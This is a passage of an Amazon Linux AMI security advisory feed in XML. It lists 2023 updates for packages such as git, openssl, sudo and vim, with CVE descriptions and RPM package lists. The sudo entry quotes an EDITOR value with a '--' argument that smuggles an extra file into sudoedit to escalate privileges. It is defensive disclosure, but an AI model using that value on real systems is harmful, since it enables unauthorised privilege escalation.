</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46784" title="" id="CVE-2021-46784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41318" title="" id="CVE-2022-41318" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid" version="3.5.20" release="17.43.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.43.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.43.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.43.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.43.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.43.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.43.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.43.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.43.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.43.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.43.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1678</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1678: medium priority package update for java-1.8.0-openjdk</title><issued date="2023-01-31 20:44:00" /><updated date="2023-02-04 18:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-21628:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Lightweight HTTP Server). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21626:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21624:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2022-21619:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21619" title="" id="CVE-2022-21619" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21624" title="" id="CVE-2022-21624" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21626" title="" id="CVE-2022-21626" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21628" title="" id="CVE-2022-21628" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.352.b08-2.70.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.352.b08-2.70.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.352.b08-2.70.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.352.b08-2.70.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.70.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.352.b08-2.70.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.352.b08-2.70.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.352.b08-2.70.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.70.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.352.b08-2.70.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.352.b08-2.70.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.352.b08-2.70.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.352.b08-2.70.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.352.b08" release="2.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.352.b08-2.70.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1679</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1679: important priority package update for git</title><issued date="2023-01-31 20:44:00" /><updated date="2023-02-04 18:13:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI 
that fix the following vulnerabilities:
CVE-2022-41903:
Git is a distributed revision control system. `git log` can display commits in an arbitrary format using its `--format` specifiers. This functionality is also exposed to `git archive` via the `export-subst` gitattribute. When processing the padding operators, there is an integer overflow in `pretty.c::format_and_pad_commit()` where a `size_t` is stored improperly as an `int`, and then added as an offset to a `memcpy()`. This overflow can be triggered directly by a user running a command which invokes the commit formatting machinery (e.g., `git log --format=...`). It may also be triggered indirectly through `git archive` via the `export-subst` mechanism, which expands format specifiers inside files within the repository during a `git archive`. This integer overflow can result in arbitrary heap writes, which may result in arbitrary code execution. The problem has been patched in the versions published on 2023-01-17, going back to v2.30.7. Users are advised to upgrade. Users who are unable to upgrade should disable `git archive` in untrusted repositories. If you expose `git archive` via `git daemon`, disable it by running `git config --global daemon.uploadArch false`.
CVE-2022-23521:
Git is a distributed revision control system. gitattributes are a mechanism that allows defining attributes for paths. These attributes can be defined by adding a `.gitattributes` file to the repository, which contains a set of file patterns and the attributes that should be set for paths matching each pattern. When parsing gitattributes, multiple integer overflows can occur when there is a huge number of path patterns, a huge number of attributes for a single pattern, or when the declared attribute names are huge. These overflows can be triggered via a crafted `.gitattributes` file that may be part of the commit history. Git silently splits lines longer than 2KB when parsing gitattributes from a file, but not when parsing them from the index. Consequently, the failure mode depends on whether the file exists in the working tree, the index or both. This integer overflow can result in arbitrary heap reads and writes, which may result in remote code execution. The problem has been patched in the versions published on 2023-01-17, going back to v2.30.7. Users are advised to upgrade. There are no known workarounds for this issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23521" title="" id="CVE-2022-23521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41903" title="" id="CVE-2022-41903" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-debuginfo" version="2.38.3" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.38.3-1.78.amzn1.x86_64.rpm</filename></package><package name="git-subtree" version="2.38.3" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.38.3-1.78.amzn1.x86_64.rpm</filename></package><package name="git-core" version="2.38.3" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.38.3-1.78.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git-core-doc" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git-instaweb" version="2.38.3" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.38.3-1.78.amzn1.x86_64.rpm</filename></package><package name="git-hg" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.38.3" release="1.78.amzn1" epoch="0" 
arch="noarch"><filename>Packages/gitweb-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.38.3" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.38.3-1.78.amzn1.x86_64.rpm</filename></package><package name="git-svn" version="2.38.3" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.38.3-1.78.amzn1.x86_64.rpm</filename></package><package name="emacs-git-el" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git" version="2.38.3" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.38.3-1.78.amzn1.x86_64.rpm</filename></package><package name="git-all" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.38.3" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.38.3-1.78.amzn1.noarch.rpm</filename></package><package name="git-core" version="2.38.3" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.38.3-1.78.amzn1.i686.rpm</filename></package><package name="git" version="2.38.3" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.38.3-1.78.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.38.3" release="1.78.amzn1" epoch="0" 
arch="i686"><filename>Packages/git-svn-2.38.3-1.78.amzn1.i686.rpm</filename></package><package name="git-subtree" version="2.38.3" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.38.3-1.78.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.38.3" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.38.3-1.78.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.38.3" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.38.3-1.78.amzn1.i686.rpm</filename></package><package name="git-instaweb" version="2.38.3" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.38.3-1.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1680</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1680: important priority package update for krb5</title><issued date="2023-01-31 20:44:00" /><updated date="2023-02-04 18:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-42898:
Integer overflow vulnerabilities in PAC parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898" title="" id="CVE-2022-42898" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-server" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="libkadm5" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libkadm5-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="55.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.15.1-55.51.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.15.1-55.51.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="55.51.amzn1" epoch="0" 
arch="i686"><filename>Packages/krb5-debuginfo-1.15.1-55.51.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.15.1-55.51.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.15.1-55.51.amzn1.i686.rpm</filename></package><package name="libkadm5" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/libkadm5-1.15.1-55.51.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.15.1-55.51.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.15.1-55.51.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="55.51.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.15.1-55.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1681</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1681: medium priority package update for vim</title><issued date="2023-01-31 20:44:00" /><updated date="2023-02-04 18:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0049:
Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.1143.
CVE-2022-4292:
Use After Free in GitHub repository vim/vim prior to 9.0.0882.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4292" title="" id="CVE-2022-4292" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0049" title="" id="CVE-2023-0049" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-debuginfo" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1160-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1160-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1160-1.1.amzn1.noarch.rpm</filename></package><package name="vim-enhanced" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1160-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1160-1.1.amzn1.noarch.rpm</filename></package><package name="vim-common" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1160-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1160-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1160-1.1.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1160" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1160-1.1.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="9.0.1160" release="1.1.amzn1" epoch="2" 
arch="i686"><filename>Packages/vim-minimal-9.0.1160-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1682</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1682: important priority package update for sudo</title><issued date="2023-01-31 20:44:00" /><updated date="2023-02-04 18:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-22809:
In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809" title="" id="CVE-2023-22809" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo-debuginfo" version="1.8.23" release="10.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.23-10.57.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="10.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.23-10.57.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.8.23" release="10.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.23-10.57.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.8.23" release="10.57.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.23-10.57.amzn1.i686.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="10.57.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.23-10.57.amzn1.i686.rpm</filename></package><package name="sudo-debuginfo" version="1.8.23" release="10.57.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.23-10.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1683</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1683: important priority package update for openssl</title><issued date="2023-02-03 23:39:00" /><updated date="2023-02-08 18:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0286:
A type confusion vulnerability was found in OpenSSL when processing X.400 addresses inside an X.509 GeneralName. When CRL checking is enabled (for example, the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or cause a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which needs a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. In this case, this vulnerability is likely only to affect applications that have implemented their own functionality for retrieving CRLs over a network.
CVE-2023-0215:
A use-after-free vulnerability was found in OpenSSL's BIO_new_NDEF function. The public API function BIO_new_NDEF is a helper function used for streaming ASN.1 data via a BIO. It is primarily used internally by OpenSSL to support the SMIME, CMS, and PKCS7 streaming capabilities, but it may also be called directly by end-user applications. The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter BIO onto the front of it to form a BIO chain, and then returns the new head of the BIO chain to the caller. Under certain conditions, for example if a CMS recipient public key is invalid, the new filter BIO is freed, and the function returns a NULL result indicating a failure. However, in this case, the BIO chain is not properly cleaned up, and the BIO passed by the caller still retains internal pointers to the previously freed filter BIO. If the caller then calls BIO_pop() on the BIO, a use-after-free will occur, possibly resulting in a crash.
CVE-2022-4304:
A timing-based side channel exists in the OpenSSL RSA decryption implementation, which could be sufficient to recover a ciphertext across a network in a Bleichenbacher-style attack. To achieve a successful decryption, an attacker would have to be able to send a very large number of trial messages for decryption. This issue affects all RSA padding modes: PKCS#1 v1.5, RSA-OAEP, and RSASVE.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304" title="" id="CVE-2022-4304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215" title="" id="CVE-2023-0215" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286" title="" id="CVE-2023-0286" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-static" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.162.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.162.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.162.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.162.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.162.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.162.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.162.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.162.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.162.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-static-1.0.2k-16.162.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.162.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.162.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1684</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1684: medium priority package update for apr-util</title><issued date="2023-02-13 20:36:00" /><updated date="2023-05-23 19:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-25147:
Integer Overflow or Wraparound vulnerability in apr_base64 functions of Apache Portable Runtime Utility (APR-util) allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime Utility (APR-util) 1.6.1 and prior versions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25147" title="" id="CVE-2022-25147" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="apr-util-mysql" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-mysql-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-pgsql" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-pgsql-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-devel" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-devel-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-odbc" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-odbc-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-ldap" version="1.5.4" 